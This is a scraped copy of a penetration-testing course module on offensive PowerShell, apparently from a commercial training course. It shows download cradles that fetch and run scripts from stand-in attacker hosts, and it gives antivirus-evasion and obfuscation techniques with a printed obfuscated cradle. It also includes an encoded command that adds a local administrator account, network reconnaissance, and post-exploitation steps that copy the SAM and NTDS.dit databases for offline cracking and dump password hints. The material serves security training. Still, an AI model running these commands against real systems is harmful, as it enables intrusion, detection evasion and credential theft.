0% found this document useful (0 votes)

50 views

Section 3 Module 3 Offensive PowerShell

Uploaded by

es169371

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

50 views

Section 3 Module 3 Offensive PowerShell

Uploaded by

es169371

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 164

3.

1 Downloading & Execution

3.2 Obfuscation

3.3 Information Gathering & Recon

3.4 Post-Exploitation With PowerShell

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:

✓ PowerShell tools we can leverage for penetration testing.

✓ Expanding the use of PowerShell for offensive purposes.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
The ability to download and execute files on our target systems is,
of course, a necessary process in our quest to maintain footholds
and persistence within a target network.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Being able to do so with tools that are already built-in to the
operating system (i.e., Living off the Land) is even more important
as it helps evade endpoint security measures and application
whitelisting solutions by using tools that are likely already
“trusted.”

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Additionally, being able to download and execute files with
PowerShell is even more advantageous in many cases, since we’re
able to operate entirely within the memory process of PowerShell,
and can avoid dropping artifacts to disk in many cases.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

There are two primary ways we can download and execute code
in regards to strictly using PowerShell and built in .Net classes or
COM objects:

1. An executable or script is downloaded to disk, which can then

be executed by PowerShell itself, or by using other executables
on the system to execute our code.
2. An executable or script is downloaded and run within the
PowerShell process memory, and never touches the disk.
(Preferred Method)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A summary of methods we can use for “In-Memory” execution
with PowerShell version 2.0: (preferred methods)
• Net.WebClient DownloadString • Excel.Application COM Object
Method • InternetExplorer.Application COM
• Net.WebClient DownloadData Object
Method • MsXml2.ServerXmlHttp Com
• Net.WebClient OpenRead method Object
• .NET [Net.HttpWebRequest] class • Certutil.exe w/ -ping argument
• Word.Application COM Object

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A summary of methods we can use for “Disk-Based” execution
with PowerShell version 2.0

• Net.WebClient DownloadFile method

• BITSAdmin.exe
• Certutil.exe w/ -urlcache argument

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

These two methods (in-memory and disk-based) are usually
accomplished using what are commonly referred to as “Download
Cradles,” and use the “System.Net.WebClient” .Net System Class
among other classes, COM objects or other Windows-native
executables to achieve this.

https://msdn.microsoft.com/en-us/library/system.net.webclient(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Most of the time, we use the “New-Object” cmdlet.

The New-Object cmdlet, as its name infers, allows us to create

instances (objects) of either .Net or COM objects.

Let’s take a look at several examples.

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/new-object?view=powershell-6

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The most common download cradle we’ll see in the field uses the
“iex” (Invoke-Expression) alias along with the Net.WebClient class
and the “DownloadString” method, which downloads and
executes a remotely hosted powershell script, and can be done
with a command like the following:
PS C:\> iex (New-Object Net.Webclient).DownloadString(“http://attacker_url/script.ps1")

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6
https://msdn.microsoft.com/en-us/library/system.net.webclient(v=vs.110).aspx
https://msdn.microsoft.com/en-us/library/fhd1f0sw(v=vs.110).aspx
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
We can run the same command from a standard windows
command prompt:
C:\> powershell.exe iex (New-Object Net.Webclient).DownloadString(‘http://attacker_url/script.ps1’)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Notice the differences in the two commands, one done from
within the powershell console, and the other called from cmd.exe.

The DownloadString URL for the latter uses single quotes when run
from cmd.exe, and double-quotes when initiating it from
powershell.exe.
PS C:\> iex (New-Object Net.Webclient).DownloadString(“http://attacker_url/script.ps1")

C:\> powershell iex (New-Object Net.Webclient).DownloadString(‘http://attacker_url/script.ps1’)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can also break the above PowerShell commands down and
execute them directly via the console with something like the
following as well:
Instantiate our
System.Net.Webclient class
as the $downloader variable

Create our $payload PS C:\> $downloader = New-Object System.Net.WebClient

variable (URL to the script) PS C:\> $payload = "http://attacker_url/script.ps1"
PS C:\> $command = $downloader.DownloadString($payload)
Create our $command PS C:\> Invoke-Expression $command
variable

Execute our $command

with the “Invoke-
Expression” (iex) cmdlet

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To demonstrate how this works, let’s create a really simple single-
command powershell script with the following contents, which we
then host on our attacker system:
Get-ProcessPaths.ps1

The above script will simply list all system processes and provide
the Process name, and paths to the process executables.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Once we’ve
hosted our script,
we can simply call
it from the
powershell
console with the
Net.WebClient
object and
DownloadString
method:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “DownloadString” method will execute our remote script in
the PowerShell process memory, so in regards to not dropping an
artifact to disk, it’s a great way to stay under the radar of endpoint
security solutions that are not monitoring powershell memory.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

It should be noted that where possible when hosting your remote

PowerShell script, to have an SSL certificate configured on the
attacker machine.

This helps in evading over-the-wire heuristics as our traffic will go

over HTTPS.

In the previous examples, we simply used HTTP, which could easily

be detected.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips
Another trick we can use which might help in evading basic file
extension heuristics is to give our PowerShell script a different
extension, for instance, “Logo.gif.” PowerShell will still execute it as
a .ps1 script.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

There are many other ways we can decrease our probability of

being detected, and we will cover some of those ways in following
slides.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

It’s also important to note that the Net.WebClient class allows us to

specify a custom user-agent string when sending the request to
our attacker URL.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

This can help us evade detection mechanisms that are flagging on

abnormal user-agent strings crossing the wire.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

We can do that with the “Headers.Add” method:

PS C:\> $downloader = New-Object System.Net.WebClient
PS C:\> $downloader.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146
Safari/537.36")
PS C:\> $payload = "http://192.168.13.62/Get-ProcessPaths.ps1"
PS C:\> $command = $downloader.DownloadString($payload)
PS C:\> iex $command

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important: Evasion Tips

We can see our user-agent string was sent as part of the

Net.WebClient GET request

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Another Net.WebClient class method we can use is the “DownloadFile” method.
This method will download your executable to disk.
Although noisy and not recommended if trying to remain stealthy, it’s still
sometimes a handy method to quickly download a file to the target system.
Instantiate our
System.Net.Webclient class
as the $downloader variable

$payload URL variable PS C:\> $downloader = New-Object System.Net.WebClient

PS C:\> $payload = "http://attacker_URL/payload.exe"
$local_file variable (will
PS C:\> $local_file = "C:\programdata\payload.exe"
save to this location)
PS C:\> $downloader.DownloadFile($payload,$local_file)
Call the object variable with
the “DownloadFile” method
and our $payload and
$local_file variables.
https://msdn.microsoft.com/en-us/library/ez801hhe(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Executing the file once it’s on our target system can be
accomplished using the call operator (&) and variable we created
for the payload ($local_file):
PS C:\> $downloader = New-Object System.Net.WebClient
PS C:\> $payload = "http://attacker_URL/payload.exe"
PS C:\> $local_file = "C:\programdata\payload.exe"
PS C:\> $downloader.DownloadFile($payload,$local_file)
PS C:\> & $local_file

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

It should also be noted that the Net.WebClient class methods can
be configured to use the systems’ proxy and default credentials
with the following commands:
PS C:\> $downloader = New-Object System.Net.WebClient
PS C:\> $payload = http://attacker_URL/script.ps1
PS C:\> $cmd = $downloader.DownloadFile($payload)
PS C:\> $proxy = [Net.WebRequest]::GetSystemWebProxy()
PS C:\> $proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
PS C:\> $downloader.Proxy = $proxy
PS C:\> iex $cmd

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Aside from the Net.WebClient class, we can also use the
Net.WebRequest class to download and execute scripts on a target,
in memory.
Instantiate our
System.Net.WebRequest
class as the $req variable

Create a $res variable to PS C:\> $req = [System.Net.WebRequest]::Create("http://attacker_URL/script.ps1")

store the WebRequest PS C:\> $res = $req.GetResponse()
response PS C:\> iex ([System.IO.StreamReader]($res.GetResponseStream())).ReadToEnd()

Use the “Invoke-Expression”

alias (iex) to invoke the
System.IO.StreamReader
and execute our code.

https://msdn.microsoft.com/en-us/library/system.net.webrequest(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Similar to the Net.WebClient class, the Net.WebRequest class can
also be configured to use a proxy as follows:
PS C:\> $req = [System.Net.WebRequest]::Create("http://attacker_URL/script.ps1")
PS C:\> $res = $req.GetResponse()
PS C:\> $proxy = [Net.WebRequest::GetSystemWebProxy()
PS C:\> $proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
PS C:\> $req.Proxy = $proxy
PS C:\> iex ([System.IO.StreamReader]($res.GetResponseStream())).ReadToEnd()

https://msdn.microsoft.com/en-us/library/system.net.webrequest(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “System.Xml.XmlDocument” class allows us to execute a
powershell command (or any system command) contained within
an attacker hosted XML document and is another great way to
execute powershell code in memory, and in a way that is likely not
detected, especially when combined with a server over HTTPS.

https://msdn.microsoft.com/en-us/library/system.xml.xmldocument(v=vs.110).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

What we’ll want to do is create an XML file with the following
contents, which we’ll host on our attacker machine:
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>

The above xml file will simply list the system processes when
executed.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Next, once our xml file is hosted, we can use the System.Xml.XmlDocument
class with the “Load” method to download, and execute it:

PS C:\> $xmldoc = New-Object System.Xml.XmlDocument

PS C:\> $xmldoc.Load("http://attacker_URL/file.xml")
PS C:\> iex $xmldoc.command.a.execute

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Com Object
We can also use COM Msxml2.XMLHTTP
Objects to both download Microsoft.XMLHTTP

and execute scripts on a InternetExplorer.Application

Excel.Application
target system. Some of the
Word.Application
COM objects available to us MsXml2.ServerXmlHttp
for this purpose are: WinHttp.WinHttpRequest.5.1 (Not Proxy Aware)

https://msdn.microsoft.com/en-us/library/windows/desktop/ms690343(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Take note that all of the above COM Objects are proxy-aware, and
will by default, use system configured proxies, except for the
“WinHttp.WinHttpRequest.5.1” object, although that object can be
configured to use one if needed.

https://msdn.microsoft.com/en-us/library/windows/desktop/aa384059(v=vs.85).aspx

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can utilize the COM objects in the same way we do with the
Net.WebClient objects, by using the “New-Object” cmdlet, but
with the “-ComObject” parameter.

In the below, we’re utilizing the “Msxml2.XMLHTTP” object for

executing a remotely hosted PowerShell Script:
PS C:\> $downloader = New-Object –ComObject Msxml2.XMLHTTP
PS C:\> $downloader.open(“GET”, “http://attacker_URL/script.ps1”, $false)
PS C:\> $downloader.send()
PS C:\> iex $downloader.responseText

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And we can do the same with the “WinHttp.WinHttpRequest.5.1”
object as well:
PS C:\> $downloader = New-Object –ComObject WinHttp.WinHttpRequest.5.1
PS C:\> $downloader.open(“GET”, “http://attacker_URL/script.ps1”, $false)
PS C:\> $downloader.send()
PS C:\> iex $downloader.responseText

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Keep in mind, that all of the previous slides and future multi-line
commands we’re showing as examples, can also be done as one-
liners, by using a semicolon (;) to break up the commands:
$dl=New-Object –ComObject Msxml2.XMLHTTP; $dl.open(“GET”, “http://attacker/script.ps1”, $false); …etc

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Alternatively, it can be wrapped up into a script and be executed
that way as well.

C:\> powershell.exe .\downloader.ps1

OR
PS C:\> .\downloader.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

With all of these examples, when executing the download cradles
from a windows command prompt or shell, or when launching the
powershell.exe executable, make sure to include the –
ExecutionPolicy Bypass and –Window Hidden options
we covered in the Fundamentals module.

This will ensure we can run our scripts and that the powershell
window stays hidden from the end-user.
C:\> powershell.exe –ExecutionPolicy bypass –Window hidden .\downloader.ps1

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A great tool we can use to help us craft obfuscated download
cradles is known as “Invoke-CradleCrafter” by Daniel Bohannon.

We encourage you to explore that tool, in addition to getting

familiar with the manual methods we covered.

https://github.com/danielbohannon/Invoke-CradleCrafter

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
As endpoint security solutions catch up with attacker methods and
implement numerous heuristics and detection signatures to catch
powershell commands as they’re being executed, we turn to
obfuscation as a layer in helping us evade those defenses.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

One of the more
well-known
frameworks we
can use for this
purpose is Daniel
Bohannon’s
Invoke-
Obfuscation.

https://github.com/danielbohannon/Invoke-Obfuscation

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Invoke-Obfuscation offers us some excellent options we can use to
obfuscate and encode our powershell commands or script blocks
using a number of methods including AES encryption with the
“SecureString” method, to special characters and even whitespace
encoding.

We’ll cover several examples in the following slides.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We’ll first need to download the Invoke-Obfuscation framework
into our modules directory, same as we did for the PowerSploit
example in the Fundamentals lesson module.

We can download the master.zip for Invoke-Obfuscation from

github here:
https://github.com/danielbohannon/Invoke-
Obfuscation/archive/master.zip

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can find a modules path to use by executing the following from
the PowerShell console:
PS C:\> $env:PSModulePath

In our case, we’ll use the first path:

C:\users\user\Documents\WindowsPowerShell\Modules

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we download and extract the Invoke-Obfuscation package
into our modules directory into a folder called “Invoke-
Obfuscation,” we should be able to import it into our current
PowerShell session:

PS C:\> Import-Module Invoke-Obfuscation

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PS C:\> Invoke-Obfuscation
Once we’ve imported the
Invoke-Obfuscation
modules, we can then
launch the framework
with the Invoke-
Obfuscation command,
and are then presented
with several different
options we can use:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We have several different options we can use to obfuscate
our PowerShell commands:
• TOKEN - Obfuscate PowerShell command Tokens
• AST - Obfuscate PowerShell Ast nodes (PowerShell 3.0 and greater)
• STRING - Obfuscate entire command as a String
• ENCODING - Obfuscate entire command via Encoding
• COMPRESS - Convert entire command to one-liner and Compress
• LAUNCHER - Obfuscate command args w/Launcher techniques (run
once at end)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For our purposes, we’ll show some use cases with the String and
Encoding methods.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

First, in order to tell Invoke-Obfuscation what we’d like to
obfuscate exactly, we first need to use the “SET SCRIPTBLOCK”
command.

As an example of a script block we can use, let’s take a standard

Net.WebClient download cradle:
iex (New-Object Net.Webclient).downloadstring("http://192.168.13.62/Get-ProcessPaths.ps1")

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The download cradle from the previous slide, when executed on
our target, will use the Net.WebClient class, and will download and
execute our “Get-ProcessPaths.ps1” script from our attacker
machine, which will simply list running processes on our target.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let’s set that as the “SCRIPTBLOCK” in Invoke-Obfuscation as the command we want to obfuscate
with the “SET SCRIPTBLOCK” command:
Invoke-Obfuscation> SET SCRIPTBLOCK iex (New-Object
Net.Webclient).downloadstring("http://192.168.13.62/Get-ProcessPaths.ps1")

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we’ve told Invoke-Obfuscation what we’d like to obfuscate with the SET
SCRIPTBLOCK command, we can select a method we’d like to use. Let’s use the
“STRING” method to start as an example. We simply type “STRING” and are
presented with several options for that method:
Invoke-Obfuscation> STRING

We have three options with the “STRING” obfuscation method. Let’s go with
option “3,” the “Reverse” method.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “REVERSE” method will first concatenate our PowerShell
command line and then reverse the entire string.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we select and run the option we want (in this case, “3”), Invoke-Obfuscation
presents us with the command it used to create the obfuscated string block, along with
the result of the command. It’s the result of the command we will execute on our target
system.

PS C:\> $Lqi7O ="NoisseRpXE-EKOvnI| )43]rahc[ f-

Obfuscated command )')'+'}0'+'{1'+'sp.sh'+'taPsse'+'corP-
teG/26.31.'+'8'+'61'+'.291/'+'/:'+'p'+'tt'+'h}0{('+'g'+'n'+'irtsdao'+'lnwo'+'
we ultimately execute d'+'.)'+'tneilcb'+'e'+'W.teN'+' tce'+'jbO-weN'+'('+' '+'x'+'ei'(( ";
on the target: [STRinG]::JOIN( '' ,$Lqi7O[ -1.. -($Lqi7O.lENgTH ) ]) |IeX

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can just copy and paste the “Result” output to our target
system in a powershell prompt, and it will execute our download
cradle:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let’s take a look at the results of the “ENCODING” method, which
provides a bit more obfuscation, and is a bit harder to detect.
Option 7, for example, is the “Special Characters” encoding.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Running that method against our script block returns us a heavily
obfuscated string.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Again, we simply
paste the
resulting output
into a powershell
console on our
target machine:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

If we’re operating from a windows command prompt on the target,
instead of a powershell console, we can use the
powershell.exe -Command option to run our obfuscated
commands, just encapsulate the result with quotes:
Quote

Quote

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

You should experiment with all of the obfuscation options available
with Invoke-Obfuscation, there’s a lot of great stuff in there, and
much of it still bypasses most antivirus solutions.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important
Something to note while using Invoke-Obfuscation is that if you’ve
applied a method to a script block, and then re-apply another
method, it will append to a previous script block, and essentially
create a very large result.

You’ll notice this when you try to apply a method and receive a
warning about the command exceeding cmd.exe’s maximum
command length:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Important

To get around this, after applying one particular encoding method,

use the “RESET” option to clear previous encodings, this way, they
won’t “pile up” on one another.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In addition to obfuscating our PowerShell commands, we can also create
obfuscated launcher commands to run our obfuscated code on the target using
the “LAUNCHER” option. For instance, if we want to use WMIC to launch our
obfuscated code, we can quickly generate a command to do so. The available
LAUNCHER options are:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The process for using the LAUNCHER option is that we first create our obfuscated
commands as we did previously:

1. We SET SCRIPTBLOCK with the code we want to execute.

2. We select an obfuscation method to generate the obfuscated command.
3. We then use the LAUNCHER
option at the end of this
process.

In this example, we’ll assume we

followed the above steps, and now
select our LAUNCHER command.
We’ll choose the RUNDLL method.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

And then the command line options we’d like to use as well, in this
case, we’ll choose “0” for No Execution Flags:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The resulting string, is an obfuscated command that utilizes
rundll32.exe with the “SHELL32.DLL” function (ShellExec_RunDLL)
which will launch our obfuscated powershell code on the target:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Invoke-Obfuscation
includes a “Tutorial”
option if you’re
stuck and need
some guidance on
some of its options:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Although not really a recommended “obfuscation” method since it
can be easily detected by Antivirus and other string heuristics,
considering it’s just base64 encoding, is PowerShell’s –
EncodedCommand parameter.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The -EncodedCommand parameter allows us to execute
encoded commands or script blocks which contain characters
which might interfere with the processing of our command via a
windows command prompt.

In simpler terms, it makes complex commands “digestible” by

PowerShell by encoding everything with Base64.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

As an example, to encode a command that will add a new user
“admin1” to the local administrator’s group, we can do the
following:
PS C:\> $command = ‘net user admin1 “p@ssw0rd9001” /ADD; net localgroup administrators admin1 /add’
PS C:\> $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
PS C:\> $encodedCommand = [Convert]::ToBase64String($bytes)

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can then get the results of our encoded command with the
“Write-Host” cmdlet against our $encodedCommand variable:

PS C:\> Write-Host $encodedCommand

bgBlAHQAIAB1AHMAZQByACAAYQBkAG0AaQBuADEAIAAiAHAAQABzAHMAdw
AwAHIAZAA5ADAAMAAxACIAIAAvAEEARABEADsAIABuAGUAdAAgAGwAbwBj
AGEAbABnAHIAbwB1AHAAIABhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAH
MAIABhAGQAbQBpAG4AMQAgAC8AYQBkAGQA

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We then execute our encoded command with the powershell.exe -
EncodedCommand parameter on the target:
C:\windows\system32> powershell.exe -encodedcommand
bgBlAHQAIAB1AHMAZQByACAAYQBkAG0AaQBuADEAIAAiAHAAQABzAHM
AdwAwAHIAZAA5ADAAMAAxACIAIAAvAEEARABEADsAIABuAGUAdAAgAG
wAbwBjAGEAbABnAHIAbwB1AHAAIABhAGQAbQBpAG4AaQBzAHQAcgBhA
HQAbwByAHMAIABhAGQAbQBpAG4AMQAgAC8AYQBkAGQA

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
PowerShell, as we’ve seen, is largely a tool we use for post-
exploitation simply due to its capability, and its availability on
systems we have access to.

Naturally, it is a post-exploitation tool. However, we can also use it

to conduct Information Gathering and Reconnaissance as well.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

There are several third-party tools, built-in cmdlets, and
frameworks that exist that can help us with these tasks, and we
will cover some of those tools and their various components to
accomplish different things.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

One of the first steps in our pentesting methodology is that of
Information Gathering and Recon.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The idea is to be able to leverage powershell for many of our
pentesting activities.

Again, considering its availability already on systems we’ve

compromised, its ease-of-use and capabilities, or simply because
the customer would like to have us perform the penetration test
from a machine that they supply.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

In that case, it becomes useful to be able to utilize powershell to
conduct many of our tasks when we’re limited in regards to our
toolset and unable to bring along all of the tools in our arsenal.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

One of our first steps should be the discovery of hosts and port
scans on the network we’re operating on.

As we saw in a previous module, we can do port scans with a one-

liner like the following, without requiring any third-party modules:
PS C:\> $ports=(80,8080,443,22);$ip=“1.1.1.1"; foreach ($port in
$ports) {try{$socket=New-Object
System.Net.Sockets.TcpClient($ip,$port);} catch{}; if ($socket -eq
$null) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" -
Open"; $socket = $null;}}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The above may be useful for a targeted probe, but not in the case
where we want to scan an entire net block as it only allows for
scanning of one IP address at a time.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

One tool we can use for efficient discovery of hosts on a network
and is included with the PowerSploit framework is the “Invoke-
Portscan” cmdlet.

https://github.com/PowerShellMafia/PowerSploit
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
First, we can utilize Invoke-PortScan to execute a ping scan (-
PingOnly) against our target network range in CIDR notation with
the “-Hosts” parameter in an attempt to identify live hosts:
PS C:\> Invoke-Portscan -Hosts "192.168.13.1/24" -PingOnly

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

PS C:\> Invoke-Portscan -HostFile ips.txt -PingOnly

We can also supply

a file containing a
list of IP addresses
with the -HostFile
parameter. The
results of which will
show “True” for live
hosts:

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

To save our results, we can pipe it to the “Export-Csv” cmdlet.
PS C:\> Invoke-Portscan -HostFile ips.txt –PingOnly | Export-Csv C:\ping_scan.csv

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Once we’ve identified live hosts, we can then conduct port scans
using the -ports parameter.

Open ports will be identified by the “openPorts” value:

PS C:\> Invoke-Portscan -HostFile live_hosts.txt -ports "53-81"

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Another useful feature of Invoke-PortScan is the ability to output in a greppable
“.gnmap” Nmap format with the -oG and -f parameters:
PS C:\> Invoke-Portscan -HostFile live_hosts.txt -oG port_scan.gnmap -f -ports "1-81"

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For a tool similar to what we’re used to for enumerating files and
directories on web servers, i.e., dirsearch, dirb, etc., we can use
PowerSploit’s “Get-HttpStatus” command.

https://powersploit.readthedocs.io/en/latest/Recon/Get-HttpStatus/

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Get-HttpStatus works in conjunction with a dictionary (-Path), like
other similar tools, and when used in conjunction with the
“Where-Object” alias (?) will return a list of pages or directories on
the web server:
PS C:\> Get-HttpStatus -Target 192.168.13.62 -Path dictionary.txt -Port 80 |
>> ? {$_.Status -match "ok"}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Another useful cmdlet we can use for host discovery, and is part of
Carlos Perez’s Posh-SecMod framework, is “Invoke-ARPScan” and
may generate fewer alerts than your usual SYN or TCP scan.
PS C:\> Invoke-ARPScan -CIDR 192.168.13.1/24

MAC Address
--- -------
00:19:CA:53:2B:4C 192.168.13.58
14:F4:B4:3A:2F:6B 192.168.13.59
00:0C:29:5B:D4:43 192.168.13.172

https://github.com/darkoperator/Posh-SecMod

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Posh-SecMod has several useful cmdlets we can use for host
discovery purposes among others.

We encourage you to explore their capabilities.

PS C:\> Get-Command –Module Posh-SecMod

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

For reverse DNS lookups, we can use Posh-SecMod’s “Invoke-
ReverseDNSLookup” cmdlet against a target CIDR block.
PS C:\> Invoke-ReverseDnsLookup -CIDR 192.168.13.0/24

HostName Aliases AddressList

-------- ------- -----------
devbox.localdomain {} {192.168.13.128}
sales.localdomain {} {192.168.13.130}
Win7-lt17.localdomain {} {192.168.13.48}
Win10-lt20.localdomain {} {192.168.13.49}

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

A couple of other DNS-related cmdlets within Posh-SecMod that
are also useful for enumerating DNS are Resolve-HostRecord and
Resolve-DNSRecord.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Resolve-HostRecord

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Resolve-DNSRecord

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Penetration Testing Professional 5.0 – Caendra Inc. © 2018
Now that we’ve covered some remote Information Gathering and
Recon methods with PowerSploit and Posh-SecMod, let’s explore
some other tools we can utilize for Post-Exploitation, which is
where our ability to leverage PowerShell really starts to shine.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

First, let’s explore another excellent post-exploitation framework,
known as “Nishang,” by Nikhil Mittal.

Nishang brings together some of the best tools from other

frameworks, in addition to Nishang-native tools as well.

https://github.com/samratashok/nishang

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

IMPORTANT

As we mentioned previously about Antivirus and the detection of

powershell and other exploitation frameworks, Nishang is no
exception, and its various modules will likely be detected if
imported directly to the target system.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

IMPORTANT
Therefore, it’s important to make sure that most of the tools and
scripts we invoke should be invoked via download cradles that
support in-memory execution. For most of the examples that
follow, we’ll be using the Net.WebClient and
DownloadString method to execute our scripts in memory.

Once we’ve hosted the Nishang framework scripts on our attacker

system, we can begin.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Let’s explore some of the “Gather” modules.

These modules will help us get information from our target system
locally, that we could potentially use to move laterally for instance.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Copy-VSS” module will attempt to copy the SAM database
using the VSS service, and if run on a domain controller, will try
and copy the NTDS.dit and contents of the SYSTEM registry hive.

We can try it with the following command:

PS C:\> iex (New-Object Net.Webclient).DownloadString(“http://attacker_url/Copy-VSS.ps1"); Copy-VSS

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The command on the previous slide will copy the contents of the
SYSTEM registry hive and the SAM file to the current working
directory on the target.

These can then be cracked offline.

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

The “Get-Information” cmdlet will get us a good deal of system
information including:
• PuTTY trusted hosts • Domain Name
• PuTTY Saved sessions • Content of hosts file
• Recently used commands • Running Services
• Shares on the target machine • Account Policy
• Environment Variables • Local Users
• Current user details • Local Groups
• SNMP information • WLAN Info
• Installed applications

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

We can download and execute it in memory with our
Net.Webclient DownloadString download cradle:
iex (New-Object Net.WebClient).DownloadString('http://attacker/Get-Information.ps1'); Get-Information

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

Get-PassHints we can use to dump the saved Password Hints for
users on the system:
iex (New-Object Net.WebClient).DownloadString('http://attacker/Get-PassHints’); Get-PassHints

Penetration Testing Professional 5.0 – Caendra Inc. © 2018

